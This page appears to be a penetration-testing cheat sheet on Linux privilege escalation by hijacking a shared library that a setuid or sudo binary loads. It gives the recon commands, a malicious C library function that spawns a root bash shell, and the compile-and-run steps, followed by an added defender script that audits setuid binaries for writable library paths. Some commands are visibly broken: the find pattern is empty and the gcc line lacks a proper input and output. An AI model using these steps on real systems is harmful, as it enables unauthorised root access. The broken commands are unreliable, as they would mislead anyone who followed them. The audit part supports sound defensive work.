Shared Library Hijacking

Last modified: 2023-09-13

Linux Privilege Escalation


When we find a binary that is setuid or can be run with sudo, inspect it to see which shared libraries it loads: the strings, the syscall trace, and the debugger all reveal the library names and paths it opens.

strings ./example
strace ./example
gdb ./example


If the binary loads a shared library whose file or containing directory we can modify, we can replace that library with our own and get a root shell. Locate the library and check the permissions on its directory.

find / -type f -name "" 2>/dev/null
ls -al /path/to/

drwxrwxrwx 1 user user 64 Dec 15 09:13


Create "foo.c". The function name must match the function the binary calls from the library it loads.

#include <stdlib.h>
#include <unistd.h>

// Replacement for the library function the binary calls;
// when the setuid binary invokes it, this spawns a shell as root.
void foo() {
    system("/bin/bash -i");
}

Then compile it into a shared object. The output file (-o) must carry the name of the library the binary loads.

gcc -shared -fPIC -nostartfiles -o foo.c

Copy the shared object into /path/to/ (the writable directory found above), then run the binary.

./example
# or
sudo ./example

We should get a root shell.
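The precondition for all of the above is a setuid/setgid binary that resolves a shared library from a file or directory that non-root users can write. The following audit script is an added example (not code from the original page) that checks for exactly that on a host, so the weakness can be found and fixed before anyone abuses it. It assumes GNU/Linux with readelf (binutils) and ldconfig available; the function names are our own.

```shell
#!/bin/sh
# Defender-side audit (added example; not code from the original page).
# Flags shared-library locations that a setuid/setgid binary would load from
# and that a non-root user could modify. Assumes GNU/Linux with readelf
# (binutils) and ldconfig; helper names are hypothetical.

# path_is_writable_by_others PATH
# Succeeds when PATH exists and its group- or other-write bit is set.
# Reads the ls mode string rather than testing -w, so the verdict does not
# depend on which user runs the audit (root can write to anything).
path_is_writable_by_others() {
    [ -e "$1" ] || return 1
    mode=$(ls -ldL "$1" | cut -c1-10)
    case "$mode" in
        ?????w*|????????w*) return 0 ;;
    esac
    return 1
}

# lib_location_is_hijackable LIBPATH
# A library can be replaced if the file itself is writable, or if the
# directory holding it is writable (a writable directory lets anyone swap
# the file, which is the drwxrwxrwx case shown above).
lib_location_is_hijackable() {
    lib="$1"
    dir=$(dirname "$lib")
    path_is_writable_by_others "$lib" || path_is_writable_by_others "$dir"
}

# audit_binary BINARY
# Prints one line per unsafe library location; returns 1 if any was found.
# Uses readelf rather than ldd, because ldd may execute the binary it inspects.
audit_binary() {
    bin="$1"
    rc=0
    # Directories embedded as RPATH/RUNPATH are searched before the defaults.
    # ($ORIGIN-relative entries are not expanded here and are skipped.)
    rpaths=$(readelf -d "$bin" 2>/dev/null | grep -E 'RPATH|RUNPATH' \
             | sed -n 's/.*\[\(.*\)\].*/\1/p' | tr ':' ' ')
    for d in $rpaths; do
        if path_is_writable_by_others "$d"; then
            echo "UNSAFE rpath dir: $d (used by $bin)"
            rc=1
        fi
    done
    # Resolve each NEEDED library through the loader cache and check it.
    needed=$(readelf -d "$bin" 2>/dev/null | grep NEEDED \
             | sed -n 's/.*\[\(.*\)\].*/\1/p')
    for lib in $needed; do
        resolved=$(ldconfig -p 2>/dev/null | awk -v l="$lib" '$1 == l { print $NF; exit }')
        if [ -z "$resolved" ]; then
            echo "UNRESOLVED: $lib (needed by $bin)"
            continue
        fi
        if lib_location_is_hijackable "$resolved"; then
            echo "UNSAFE library: $resolved (needed by $bin)"
            rc=1
        fi
    done
    return $rc
}

# audit_all: run audit_binary over every setuid/setgid file on the root filesystem.
audit_all() {
    find / -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null \
        | while read -r b; do audit_binary "$b"; done
}

# Usage: sh audit_suid_libs.sh --all   |   sh audit_suid_libs.sh /path/to/example
case "${1:-}" in
    --all) audit_all ;;
    "") ;;
    *) audit_binary "$1" ;;
esac
```

Anything the script reports as UNSAFE should be fixed by tightening the directory and file permissions (root-owned, mode 755 for directories and 644 for libraries) or by rebuilding the binary without the writable RPATH; an UNRESOLVED entry means the library is not in the loader cache and is worth checking by hand.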